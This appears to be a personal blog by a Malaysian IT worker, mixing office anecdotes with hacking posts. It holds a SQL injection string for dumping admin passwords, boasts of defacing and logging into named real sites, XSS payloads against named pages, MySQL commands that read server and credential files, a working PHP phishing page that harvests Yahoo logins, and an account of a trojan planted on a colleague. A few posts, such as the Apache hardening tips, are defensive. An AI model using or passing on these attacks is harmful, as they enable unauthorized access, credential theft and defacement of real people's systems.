SQL Injections

Posted by ghimau under
Based from the milworm exploit. I managed to defaced these pages via sql injections.
Changed a bit the sql injections


view_sub_cat.php?cat_id=99%20UNION%20ALL%20SELECT%201,2,concat(,admin_user,::,admin_password,),4%20FROM%20admin_users--


http://www.virtuosoworld.com/



http://bye5.com/indexXXXX.php


Greetz to : t0pP8uZz & xprog

Defaced

Posted by ghimau under
Just to make aunty virus 'jeles' hihihi
Just to test sql injection in cgi pages..

Apache Hardening

Posted by ghimau under
Attn: alycia
Based on my findings yesterday, here are some hardening tips to your apache server.

1. To disable server-infoOpen your apache httpd.conf, find the following paragaraph
SetHandler server-info
Order deny,allow
Allow from all
Change to this to, then restart your apache(httpd) server.
SetHandler server-info
Order deny,allow
#Allow from all
Deny from all

2. To disable server-statusOpen your apache httpd.conf, find the following paragaraph
SetHandler server-status
Order deny,allow
Allow from all
Change to this to, then restart your apache(httpd) server.
SetHandler server-status
Order deny,allow
#Allow from all
Deny from all

3. To disable directory listing, which is the most crucial part.Open your apache httpd.conf, find the following paragaraph
Options FollowSymLinks ExecCGI Indexes
AllowOverride None
# Controls who can get stuff from this server.
Order allow,deny
Allow from all
Change to this to, then restart your apache(httpd) server.
Options FollowSymLinks ExecCGI Indexes
AllowOverride None
# Controls who can get stuff from this server.
Order allow,deny
#Allow from all
Deny from all

If you done it right, you'll get 403 Forbidden error message when trying to access the 'vulnerable' page

Open source is secure only if you put some effort to secure it. Otherwise, it is more vulnerable comparing to windows

Web Application

Posted by ghimau under
Att: alycia
Just now I did a very simple 'test' on that server, I found the directory listing is on. The interesting directories are :
/admin/
/server-status/
/server-info/

Both the server-* directories are only information disclosure vulnerabilites.
But the /admin/.. hmm.. looks interesting.

To do a complete pen-test, needs a lot of time, there's no a single silver bullet to 'hack'.

Last week, I found that the application is vulnerable to cookie-session injection attack. I told abg mazani, and give him the proper solution.

Thanks kecik13

Posted by ghimau under

Thank you kecik13, for the nice graphic. Quite bz these couple of days, did'nt have much time to do my 'hacking'. Hihihi



GFI Languard 8.0

Posted by ghimau under
Downloaded the new version of languard http://www.gfi.com/lannetscan/
Did'nt have much time to test it though.


Splash screen - looks the same as version 7.0


Performing a remote test on aunty virus's pc. :)

Boring..

Posted by ghimau under
Ah so boring.. to teach microsoft powerpoint..
Trying to do a POC on XSS. Just popping a simple alert dialog box.
[script]alert('POC of XSS by ghimau')[/script]

Click here : http://www.danceinterrupted.com/guestbook.asp

Do redirect to another page, making it looks like been defaced, use this script.
[script]window.location = "http://www.google.com"[/script]

SQL Injections

Posted by ghimau under
While helping Abg Mazani teaching Powerpoint Course, I did 'try' some sites hunting for sql injections login bypass.

Kak Zaimah did'nt come to ofiice today.


Indian Jurnal Site login page


Logged in as the first user


Got the username


Cineplex login page



Logged in :)

Target : http://219.94.87.77/BP/Asps/Login/default.asp
Table UserAcc
Column varUserID,varUserPwd

Keyword is : blind *ql hihihi

Latest Points

Posted by ghimau under
My latest points on Hellbound Hackers :)



Hackers are here, where are you?

Isk..Isk.

Posted by ghimau under
Isk..Isk.. While I was creating the report for 'Pertandingan Laman Web', I noticed that En. Aziz's marks is missing. I told aunty virus about that.

We were busy searching the file, almost 1 hour of blind search! The file was on Kak Liza's table all the while! Hampeh!

The sad thing is that, the file is about 2 inchies thick.. and I have to review the marks.. Ah! 'Tidak!'

New Tutorials

Posted by ghimau under
Added a couple of tutorials on Hacking Windows XP.

HackerMalaysia thread (Part 1) :
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=363&pid=2889#post_2889

HackerMalaysia thread(Part2):
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=364&pid=2890#post_2890

Pdf version:
Part 1 : http://www.geocities.com/terlaklintau/xp/XP1.pdf
Part2 : http://www.geocities.com/terlaklintau/xp/XP2.pdf

Hmm.. this morning aunty virus told me to settle 'Pertandingan Laman Web''s matters. She 'sempat mengumpat mak tiri' Hihihi

EL

Posted by ghimau under
EL? Emergency leave. Today I'm on EL :). Thanks to aunty virus, she's the one who 'hasut' me to take EL today.Wanna know the reason why? Hmm.. I think better it is kept secret between us. :)

Well, today is a wonderful day, which will be written in my life's diary. Aunty Virus, Kecik13, Alycia, and my girlfriend Alia, we all had lunch together at kfc. :) Yeah, a nice friendship is built from a strong foundation of sincerity. Ukhuwwah fillahi abadan.

To aunty virus, all this while, i 'kelentong' my awek, told her that kak zaimah is around 40's, she is fat. Hihihi..Sorry :P



My awek's car. She had an accident last 2 weeks. Luckily, she was safe.


Side view of her car

This picture has nothing to do with this blog entry, just to make aunty virus 'cuak' a bit. Hihihi

Trip to Cyberjaya

Posted by ghimau under
Yesterday morning, I received a sms from aunty virus, "sein, akak try ftp kat secondary web server kita tapi tak dapat."

Hmm.. when I came to the office, she asked me to go to telekom web hosting, at cyberjaya. We had a breakfast, at Jas Cafe, Serdang. I did 'kelentong' her several things, and she believed me :) Hahaha

Hmm.. and the most thrilling part is, we went there with my car, which had no road tax.Hihihi
We reached at Telekom around 10.15 am, finishing our work around 3.30 pm.


Nice, using WatchGuard Firewall. Notice the baju kurung's shadow? Well, it belongs to aunty virus :)



Dell's server


Who is this?? Muhahaha.. Nice post my friend :)

More bugs in government site?

Posted by ghimau under
Hmm.. My Bos aunty virus, asked me to call an officer regarding 'Pertandingan Laman Web'. While searching his telephone number in his agency's site (a very well known government agency), i found a bug that 'might' lead to be defaced! The infamous rfi bug. Hmm..

I did'nt go any further to test the bug. I've informed the appropriate person handling this kind of issue.

http://xxx.xxxxx.xxx.xx/xxxxxx.php?section=[evil script]

IBM Security Security Site?

Posted by ghimau under
Hmm.. an IBM Security Site, regarding mitigating XSS attack. The funny thing is that, the site itself is vulnerable to XSS attack! What the hell :)

Just open (copy and paste it in your ie) the link below, and you'll notice a nice pop up, showing my name. Muhahaha

http://www-1.ibm.com/support/docview.wss?uid=swg21233077&loc=%22%3E%3Cbody%20onload=alert('ghimau')%20x=%22en_US

Added a tutorial on basic C programming. Posted in HackerMalaysia site. I've uploaded the pdf version to my site. Feel free to review it :)

Part 1
Part 2

Hacking History

Posted by ghimau under
Hmm.. I came across a nice pdf document regarding Hacking History.

Quite a dull evening. Need to take a break.

Hacking Via MySQL

Posted by ghimau under
Hmm..
Want to try hack your server via mysql?
Hihihi

Ok, you can 'print' any file in the server to the monitor (running mysql) using load_file() function, in mysql.

Go to your command prompt.
mysql>

Type in the following command:
mysql>select load_file('c:/dns.txt');

dns.txt can be any file in your server

By using load data infile function, you can transfer any file, or database content to a newly created database.

mysql>load data infile 'c/dns.txt' into table table_name;

Ok.. so you want to copy a table to your newly created table?

mysql> create database db_ghimau;
mysql> use db_ghimau;
mysql> create table tbl_ghimau (filename varchar(20),content longblob);

Then copy the data!

mysql> insert into tbl_ghimau values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_ghimau values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_ghimau values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));

Homestay..Homestay..

Posted by ghimau under
Hmm.. Today, aunty virus and i have to meet Dr Baharom UPEN, discussing about homestay's website. Argh..

Hmm.. the internet connection is so slow.. i think a snail is much more faster!

I've called mastura from fbest, and sharifah from pelegong, asking them to send the details and information regarding their homestay's, to develop a site for them.

Hmm.. its not a big deal for me to create a site, but the problem is.. graphics !
I just cannot put my hands on 'graphics' :)

Hmm.. After all, I'm in the multimedia unit.. so this is what i have to do.. :(

My Exam Transcript

Posted by ghimau under
I called Adonis, regarding my C|EH exam transcript.
Presenting.. mark.. (Riaknya aku :)



Remember to click the above image, to see a larger view..
So Kak Zaimah.. are you jeles? :P


Welcome To The Club

Posted by ghimau under
Welcome to Miss Alycia to hakes club.

May the force be with you..

Muhahahaha (Gelak hakes)

APC

Posted by ghimau under
What is APC? Anugerah Perkhidmatan Cemerlang. :)
Today, I'm going for the ceremony..

Thanks a lot to my friends in UPTM, especially to my bos Puan Zaimah (yang nak jadi hakes), my Pengarah, Puan Hajah Ruhazah and my best friend, Mazni (kecik 13).

Thanks to ya all.

Boring Evening

Posted by ghimau under
Hmm.. I'm working on a tutorial, to add contents via Events Calendar components. Arif from Gemas called Kak Zaimah this morning, asking for the tutorial.

Hmm.. yesterday, Kak Yati asked me, if i know how to enable Run menu, if it is disabled by virus.

OK.. I've created a simple VB Script, to do the job. You can download it at http://geocities.com/terlaklintau/recoverrun.txt
Just rename the file from recoverrun.txt to recoverrun.vbs. Double click on the file, and you have it :)

So wan and nizam can simply download and use this script.

Hmm.. Yes.. Kak Zaimah was so 'malu' because she bet me, she can save flash file from her ie. I've told her she cant do that, but she was so 'degil'

Hihihi

Only 'hakes' can download flash file via Internet Explorer. Hahahaha

UIA Memories

Posted by ghimau under
Hmm.. UIA.. a nice place..
But unlucky for me.. I was there for only 1 semester.. :)


UIA waterfront



Nice .. huh!



Garden of Knowledge and Virtue



UIA...

Yahoo Mail Hack

Posted by ghimau under
Wanna hack yahoo mail?

Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).

Ok.. let's move on..

1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.


youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>


2. Download the yahoo mail login page. Change the action= to your newly php file.

3. Send a link to your victim.

4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password

Hi Guys

Posted by ghimau under
Hi.. sorry did'nt update my blog for a long time. I was quite bz doing some works. But guess what? I pass my CEH exam. Was'nt so hard.

Hmm.. my current project?
Hihihi..
I'm developing a new trojan, in Visual Basic. Looks almost the same as Sub7.
Hmm.. need to add some more functions.
1. Edit server - just like the Sub7
After finishing the project, i'll make it available to public :)

On the staging stage, I've tested the trojan on Puan Zaimah (Yang nak jadi hakes), hihihi
She was so terrified and almost want to cry..

I packed the tojan with a legitimate program cleaner.exe.
I was so 'kesian' to her, because, she almost want to nangis.
Ish..ish..
Only her nickname was 'ganas', but she is not 'ganas' at all.

Hihihihih
My Client trojan in action :)